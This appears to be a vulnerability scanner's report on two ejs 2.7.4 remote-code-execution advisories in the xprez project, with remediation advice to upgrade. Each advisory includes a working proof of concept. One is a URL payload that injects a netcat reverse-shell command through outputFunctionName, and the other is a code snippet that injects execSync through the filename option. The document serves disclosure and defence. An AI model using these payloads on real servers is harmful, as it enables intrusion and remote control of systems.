Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
-
Introduced through: xprez@yzhan1/xprez#c1c896a868d54c924d7050c74e0a8dba8a64ca30 › ejs@2.7.4Remediation: Upgrade to ejs@3.1.7.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the view options
parameter of renderFile
, which makes it possible to inject code into outputFunctionName
.
Note: This vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.
PoC:
Creation of reverse shell:
http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
Remediation
Upgrade ejs
to version 3.1.7 or higher.
References
medium severity
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
-
Introduced through: xprez@yzhan1/xprez#c1c896a868d54c924d7050c74e0a8dba8a64ca30 › ejs@2.7.4Remediation: Upgrade to ejs@3.1.6.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Arbitrary Code Injection via the render
and renderFile
. If external input is flowing into the options
parameter, an attacker is able run arbitrary code. This include the filename
, compileDebug
, and client
option.
POC
let ejs = require('ejs')
ejs.render('./views/test.ejs',{
filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
compileDebug: true,
message: 'test',
client: true
})
Remediation
Upgrade ejs
to version 3.1.6 or higher.